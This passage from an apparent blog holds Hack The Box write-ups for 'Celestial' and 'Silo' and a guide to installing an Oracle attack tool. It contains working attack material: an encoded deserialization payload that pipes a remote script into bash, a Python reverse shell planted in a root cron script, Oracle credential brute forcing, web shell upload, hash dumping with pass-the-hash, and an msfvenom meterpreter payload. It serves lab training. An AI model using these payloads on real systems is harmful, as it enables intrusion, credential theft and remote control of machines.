eyJydW4iOiAiXyQkTkRfRlVOQyQkX2Z1bmN0aW9uICgpe2V2YWwoU3RyaW5nLmZyb21DaGFyQ29kZSgxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTQsMTAxLDExMywxMTcsMTA1LDExNCwxMDEsNDAsMzksOTksMTA0LDEwNSwxMDgsMTAwLDk1LDExMiwxMTQsMTExLDk5LDEwMSwxMTUsMTE1LDM5LDQxLDQ2LDEwMSwxMjAsMTAxLDk5LDQwLDM5LDk5LDExNywxMTQsMTA4LDMyLDEwNCwxMTYsMTE2LDExMiw1OCw0Nyw0Nyw0OSw0OCw0Niw0OSw0OCw0Niw0OSw1Myw0Niw0OSw0OCw0NywxMTUsMTExLDk5LDk3LDExNiw0NiwxMTUsMTA0LDMyLDEyNCwzMiw5OCw5NywxMTUsMTA0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsMTE0LDExNCwxMTEsMTE0LDQ0LDMyLDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQ0LDMyLDExNSwxMTYsMTAwLDEwMSwxMTQsMTE0LDQxLDMyLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMTEsMTEwLDExNSwxMTEsMTA4LDEwMSw0NiwxMDgsMTExLDEwMyw0MCwxMDEsMTE0LDExNCwxMTEsMTE0LDQxLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDk5LDExMSwxMTAsMTE1LDExMSwxMDgsMTAxLDQ2LDEwOCwxMTEsMTAzLDQwLDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQxLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDEyNSw0MSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMikpfSgpIn0=

getting shell

root@dastinia:~/htb/celestial# socat file:`tty`,raw,echo=0 tcp-listen:8181
sun@sun:~$ id
uid=1000(sun) gid=1000(sun) groups=1000(sun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
sun@sun:~$ uname -a
Linux sun 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
sun@sun:~$

Privilege Escalation

While getting the user.txt flag we can observe a strange python file called script.py

sun@sun:~/Documents$ ls -la 
total 16
drwxr-xr-x  2 sun sun 4096 Mar  4 15:08 .
drwxr-xr-x 21 sun sun 4096 Aug 24 15:29 ..
-rw-rw-r--  1 sun sun   29 Sep 21  2017 script.py
-rw-rw-r--  1 sun sun   33 Sep 21  2017 user.txt
sun@sun:~/Documents$ cat script.py 
print "Script is running..."

Going up a directory we can observe that there is a text file named output.txt owned by root that contains the exact same text as the python script.

sun@sun:~$ ls -l
total 56
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Desktop
drwxr-xr-x  2 sun  sun  4096 Mar  4 15:08 Documents
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Downloads
-rw-r--r--  1 sun  sun  8980 Sep 19  2017 examples.desktop
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Music
drwxr-xr-x 47 root root 4096 Sep 19  2017 node_modules
-rw-r--r--  1 root root   21 Mar  4 15:40 output.txt
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Pictures
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Public
-rw-rw-r--  1 sun  sun   870 Sep 20  2017 server.js
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Templates
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Videos
sun@sun:~$ cat output.txt
Script is running...

It appears that that every 5 minutes it looks like the root user is running whatever is in script.py. Since we permissions to modify the script.py I added the following content:


print "Script is running..."
print "hey test"
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.15.10",8282));os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Now all we have to do is just wait for root to run our script, which should give us a reverse (root) shell…

sun@sun:~/Documents$ cat script.py
print "Script is running..."
print "hey test"
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.15.10",8282));os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Sure enough, we are delivered a fresh root shell after 5 minutes…

root@dastinia:~/htb/celestial# nc -lnvp 8282
listening on [any] 8282 ...
connect to [10.10.15.10] from (UNKNOWN) [10.10.10.85] 42792
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a 
Linux sun 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
# cat /root/root.txt 
ba1d0...[snip]...

Looking at root’s crontab we can see how it was happening

# crontab -l
# Edit this file to introduce tasks to be run by cron.
...[snip]....
# 
# m h  dom mon dow   command
*/5 * * * * python /home/sun/Documents/script.py > /home/sun/output.txt; cp /root/script.py /home/sun/Documents/script.py; chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py; touch -d "$(date -R -r /home/sun/Documents/user.txt)" /home/sun/Documents/script.py

Hack the Box - Silo Write up

2018-08-04T00:00:00-04:00

Introduction

This is probably one of the few times I voluntarily attempted to take a crack at attacking an oracle database server. I’ve had a little experience messing around with oracle databases at work, but I can’t say I knew much or anything at all about them. This box was pretty valuable to me since I got to learn some techniques and tactics about how to attack oracle databases. Once you got over the first hurdle silo wasn’t an overly obtuse box.

Tools Used

Enumeration

Initial Scanning

Like with every box let’s begin with a scan of the machine Silo (10.10.10.82). I’ve started to really enjoy using HTB almot’s htbscan.py script.

# Nmap 7.70 scan initiated Sun Jun 24 11:48:59 2018 as: nmap -sV -A -v -p49158,49153,1521,80,139,49161,49160,5985,49155,135,49154,49162,47001,445 -oA nmap/open_ports 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.15s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%), Microsoft Windows Server 2008 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.074 days (since Sun Jun 24 10:05:06 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2018-06-24 11:51:05
|_  start_date: 2018-06-24 10:05:23

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   155.91 ms 10.10.14.1
2   154.66 ms 10.10.10.82

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 24 11:51:27 2018 -- 1 IP address (1 host up) scanned in 148.15 seconds

We see some interesting services listening right off the back that will be interesting to investigate, which includes an Oracle TNS Listener (oracle database), SMB on port 445, and a web service.

Enumeration

Enumerating IIS - Port 80

We attempt to discover hidden directories or content, but that comes up with nothing valuable.

root@dastinia:~/htb/silo# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://10.10.10.82 -x asp,aspx -s 200,204,301,302,307,403 -t 100 | tee gobuster_silo

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.82/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,403,200,204
[+] Extensions   : .asp,.aspx
=====================================================

Enumerating Oracle DB - Port 1521

I wrote quick ODAT Installation tutorial a few days prior since some people were having issues installing ODAT on kali.

ODAT is an open source penetration testing tool targeted at attacking, and auditing the security of Oracle Database servers.

After I read up on some Oracle Database attacking methodologies:

[1] - https://www.slideshare.net/martintoshev/oracle-database-12c-attack-vectors

[2] - https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/

[3] - http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf

[4] - http://pentestdiary.blogspot.com/2017/08/oracle-database-penetration-testing.html

The general idea methodology that I took away from it was that we needed to:

Enumerate Oracle Database Version
Discover SIDs (Basically oracles version a unique ‘database instance’)
obtain a user account (likely through bruteforcing)
Exploitation / privesc as needed.
Repeat

From our Nmap scan we already know that the oracle database is running version 11.2.0.2.0

We can use ODAT’s siguesser to discover well

root@dastinia:/opt/odat# ./odat.py sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'SAMPLE' is a valid SID. Continue...
[+] 'SCAN4' is a valid SID. Continue...
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
100% |###################################################################################################################################################################################################################################################################################################| Time: 00:10:55
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###################################################################################################################################################################################################################################################################################################| Time: 00:00:12
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |###################################################################################################################################################################################################################################################################################################| Time: 00:07:31
[+] SIDs found on the 10.10.10.82:1521 server: SAMPLE,SCAN4,XE,XEXDB

We can use the metasploit module msf > use admin/oracle/oracle_login to bruteforce SIDS

msf > use admin/oracle/oracle_login
msf auxiliary(admin/oracle/oracle_login) >
msf auxiliary(admin/oracle/oracle_login) > options

Module options (auxiliary/admin/oracle/oracle_login):

   Name     Current Setting                                                              Required  Description
   ----     ---------------                                                              --------  -----------
   CSVFILE  /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv  no        The file that contains a list of default accounts.
   RHOST                                                                                 yes       The Oracle host.
   RPORT    1521                                                                         yes       The TNS port.
   SID      ORCL                                                                         yes       The sid to authenticate with.

msf auxiliary(admin/oracle/oracle_login) > set RHOST 10.10.10.82
RHOST => 10.10.10.82
msf auxiliary(admin/oracle/oracle_login) > set SID XE
SID => XE
msf auxiliary(admin/oracle/oracle_login) > run -j
[*] Auxiliary module running as background job 0.

[*] Starting brute force on 10.10.10.82:1521...
[+] Found user/pass of: scott/tiger on 10.10.10.82 with sid XE
[*] Auxiliary module execution completed

You will discover that there is a valid user account for scott:tiger

We also discover that we can connect to the database as SYSDBA.

failed connection as sysoper

root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysoper

SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:14:55 2018

Copyright (c) 1982, 2014, Oracle.  All rights reserved.

ERROR:
ORA-01031: insufficient privileges


Enter user-name:

connecting as sysdba

root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysdba

SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:15:23 2018

Copyright (c) 1982, 2014, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL>

Exploitation

From reading over the modules there seemed to be a few modules we could attempt to leverage for code execution, or arbitrary file upload/read.

The ODAT developer was extremely nice to provide a wiki of all the modules, and some examples:

utlfile - Allows us to upload/download files from our local machine to the remote machine

externaltabe - allows us to execute a binary with the priviledges of the Oracle database server (only if the binary is stored on the server)

ctxsys - Read file from the local server

dbmsadvisor - upload file to the local server

So some attack paths we can take:

Since a web service is running on the box we can upload a web shell (aspx) to interact with the server
Upload binary payload like something generated with msfvenom, and execute it.
Read potentially sensitive files which we can use to attempt to utilize for further privilege escalation.

I used the first method since we will end up discovering that the oracle database was running with system privileges.

I used the following aspx web shell, and uploaded to the well-known default IIS web root directory C:\inetpub\wwwroot.

root@dastinia:/opt/odat# ./odat.py utlfile -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /root/htb/silo/silo_shell.aspx --sysdba

[1] (10.10.10.82:1521): Put the /root/htb/silo/silo_shell.aspx local file in the C:\inetpub\wwwroot\ folder like shell.aspx on the 10.10.10.82 server
[+] The /root/htb/silo/silo_shell.aspx file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the shell.aspx file

Analyzing Memory Dump with Volatility

We are given a dropbox link, and a password to access what appears to be a memory dump.

Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link 
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
£%Hm8646uC$

Let’s begin analyzing this memory dump by inspecting the processes

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe00000089940 System                    4      0     84        0 ------      0 2018-01-05 22:17:14 UTC+0000
0xffffe00000c9c100 smss.exe                208      4      3        0 ------      0 2018-01-05 22:17:14 UTC+0000
0xffffe000034f54c0 csrss.exe               324    316     10        0      0      0 2018-01-05 22:17:15 UTC+0000
0xffffe000034ec380 csrss.exe               396    388     10        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe000034ac940 wininit.exe             404    316      4        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00002fee080 winlogon.exe            448    388      5        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003550940 services.exe            492    404     10        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003ed4080 lsass.exe               500    404      6        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f22500 svchost.exe             560    492     15        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f39940 svchost.exe             604    492     15        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f6f680 dwm.exe                 688    448      9        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f68940 vmacthlp.exe            708    492      2        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003fb9080 svchost.exe             764    492     16        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00003fcc940 svchost.exe             800    492     63        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00003fe3940 svchost.exe             832    492     20        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004e267c0 svchost.exe             920    492     25        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004e8d940 svchost.exe             340    492     16        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f2e940 spoolsv.exe             308    492     13        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f5c940 svchost.exe            1052    492     11        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f84940 oracle.exe             1088    492     30        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004fe93c0 OraClrAgnt.exe         1192    492      2        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004fef940 TNSLSNR.EXE            1208    492      5        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004ff0300 agtctl.exe             1216   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe00004ff3940 agtctl.exe             1264   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe00004ffc440 svchost.exe            1272    492      4        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004fff080 VGAuthService.         1324    492      3        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060568c0 agtctl.exe             1348   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe000060767c0 agtctl.exe             1388   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe0000608f780 vmtoolsd.exe           1444    492      8        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060a62c0 ManagementAgen         1492    492      9        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060c7940 svchost.exe            1516    492     16        0      0      0 2018-01-05 22:17:19 UTC+0000
0xffffe00003051940 svchost.exe            2000    492      5        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe00003077880 TPAutoConnSvc.         1256    492      8        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030a1080 dllhost.exe            1432    492     21        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030b7940 dllhost.exe            1600    492     17        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030cd940 WmiPrvSE.exe           1440    560     12        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030cf940 msdtc.exe              2052    492     13        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe00003117940 VSSVC.exe              2228    492      7        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe00003149080 sppsvc.exe             2284    492      5        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe0000315f940 SppExtComObj.E         2312    560      5        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe000061637c0 taskhostex.exe         2368    800      7        0      1      0 2018-01-05 22:17:33 UTC+0000
0xffffe00004e00680 explorer.exe           2424   2416     56        0      1      0 2018-01-05 22:17:33 UTC+0000
0xffffe00000df34c0 ServerManager.         2732   2376     24        0      1      0 2018-01-05 22:17:35 UTC+0000
0xffffe0000301c940 TPAutoConnect.         2824   1256      3        0      1      0 2018-01-05 22:17:37 UTC+0000
0xffffe00003f698c0 conhost.exe            2832   2824      1        0      1      0 2018-01-05 22:17:37 UTC+0000
0xffffe0000136d080 vmtoolsd.exe           2992   2424      8        0      1      0 2018-01-05 22:17:45 UTC+0000
0xffffe00003224540 WmiPrvSE.exe           3056    560     19        0      0      0 2018-01-05 22:17:47 UTC+0000
0xffffe00003239940 WmiPrvSE.exe           2340    560     10        0      0      0 2018-01-05 22:17:47 UTC+0000
0xffffe0000325c940 WmiApSrv.exe            864    492      5        0      0      0 2018-01-05 22:17:48 UTC+0000
0xffffe00003203340 DumpIt.exe             2932   2424      4        0      1      0 2018-01-05 22:18:06 UTC+0000
0xffffe00003f8c940 conhost.exe            2764   2932      2        0      1      0 2018-01-05 22:18:06 UTC+0000

It looks like the forensics tool DumpIT was used to create this memory dump. Which likely means it was done with admin privileges.

We can use the hashdump volatility module to dump the hashes of the accounts stored on the system. This is the equivalent of doing a hashdump with meterpreter. We just need to get the virtual offsets of the SYSTEM & SECURITY hives using the hivelist module first. Which happen to be 0xffffc00000028000 & 0xffffc00000619000 respectively.)

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat

dumping hashes

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::

Getting System

Now we can use the hashes we dumped with a tool like pth-winexe on kali to get administrator privileges.

root@dastinia:~/Desktop# pth-winexe -U "Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::" //10.10.10.82 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
silo\administrator

C:\Windows\system32>
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cd3...[redacted]....

Getting Systemv2

We can use the externaltable module to execute a binary (or command) against the system. Using a combination of impacket-smbserver + externaltable we can achieve remote code execution.

generating our payload

root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.98 LPORT=6969 -f exe > 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

Start up an impacket-smbserver

root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

execute our payload stored on our smb share

root@dastinia:/opt/odat# ./odat.py externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \\\\10.10.14.98\\kk 6969.exe

[1] (10.10.10.82:1521): Execute the 6969.exe command stored in the \\10.10.14.98\kk path

getting system shell

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.98:6969
[*] Sending stage (206403 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.98:6969 -> 10.10.10.82:49173) at 2018-08-04 22:53:15 -0400

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SILO
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_GB
Domain          : HTB
Logged On Users : 0
Meterpreter     : x64/windows
meterpreter >

Installing Oracle Database Attacking Tool (ODAT) on Kali Rolling (2018)

2018-07-31T00:00:00-04:00

Overview

I decided to write a quick little guide on installing the Oracle Database Attacking Tool (ODAT) on the latest version of Kali Linux since I noticed people were running into issues with it.

ODAT is an open source penetration testing tool targeted at attacking, and auditing the security of Oracle Database servers.

Requirements

git
python 2.7.x
An account on oracle.com or use something like bugmenot.com

Installation

Note: For this setup ODAT is being installed on the latest version of Kali at the moment (2018.2)

We are also installing the development version of ODAT (seems to work better than the release binaries)

Getting instaclient, sdk, and sqlplus

Oracle forces you to register to their site in order to download pretty much anything (thanks oracle).

You can create a temporary email using any temporary email service like 10minutemail.com, your own personal email (why?), or use the service bugmenot.com to get a login. After you’ve logged in you need to download the following items.

(all version 12.2.0.1.0)

we need to move all these files from the downloads directory into the /opt/oracle directory.

root@kali:~/Downloads# mkdir -p /opt/oracle/
root@kali:~/Downloads# cp instantclient-* /opt/oracle/

After you’ve downloaded the following files ensure you unzip the instantclient-basic-linux.x64-12.2.0.1.0.zip zip first.

root@kali:~/Downloads# cd /opt/oracle/
root@kali:/opt/oracle# unzip instantclient-basic-linux.x64-12.1.0.2.0.zip
root@kali:/opt/oracle# unzip instantclient-sdk-linux.x64-12.1.0.2.0.zip
root@kali:/opt/oracle# unzip instantclient-sqlplus-linux.x64-12.1.0.2.0.zip

You should now have an “instantclient_12_1” directory.

Create symlink to the libclntsh.so.12.1 so file.

root@kali:/opt/oracle# cd instantclient_12_1/
root@kali:/opt/oracle/instantclient_12_1# ln libclntsh.so.12.1 libclntsh.so

Add the following to your bashrc

echo " 
export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1
" >> ~/.bashrc

reload bashrc

root@kali:/opt/oracle/instantclient_12_1# source ~/.bashrc

If you are able to run sqlplus without any errors you are good to continue.

root@kali:/opt/oracle/instantclient_12_1# sqlplus

SQL*Plus: Release 12.1.0.2.0 Production on Wed Aug 1 03:08:10 2018

Copyright (c) 1982, 2014, Oracle.  All rights reserved.

Enter user-name:

Installing ODAT (development version)

From this point forward, it’s basically following the guide on the github setup page minus a few steps. (I recommend doing an apt-get update before performing the following steps)

root@kali:~# cd /opt/
root@kali:/opt# git clone https://github.com/quentinhardy/odat.git
cd odat/

Install: libaio1 python-dev alien python-pip python-scapy

root@kali:/opt/odat# apt-get install -y libaio1 python-dev alien python-pip python-scapy

install: cx_Oracle

root@kali:/opt/odat# pip install cx_Oracle

Test to make sure the dependencies so far have installed correctly. You shouldn’t have any errors here.

root@kali:/opt/odat# python -c 'import cx_Oracle'

Install the following python packages from pip: colorlog termcolor pycrypto passlib argcomplete

root@kali:/opt/odat# pip install colorlog termcolor pycrypto passlib argcomplete

Active python-argcomplete

root@kali:/opt/odat# activate-global-python-argcomplete

ODAT should be fully functioning without any issue. Good Luck

root@kali:/opt/odat# ./odat.py -h
usage: odat.py [-h] [--version]
               {all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
               ...

            _  __   _  ___
           / \|  \ / \|_ _|
          ( o ) o ) o || |
           \_/|__/|_n_||_|
-------------------------------------------
  _        __           _           ___
 / \      |  \         / \         |_ _|
( o )       o )         o |         | |
 \_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------

By Quentin Hardy (quentin.hardy@bt.com or quentin.hardy@protonmail.com)

positional arguments:
  {all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}

                      Choose a main command
    all               to run all modules in order to know what it is possible to do
    tnscmd            to communicate with the TNS listener
    tnspoison         to exploit TNS poisoning attack
    sidguesser        to know valid SIDs
    passwordguesser   to know valid credentials
    utlhttp           to send HTTP requests or to scan ports
    httpuritype       to send HTTP requests or to scan ports
    utltcp            to scan ports
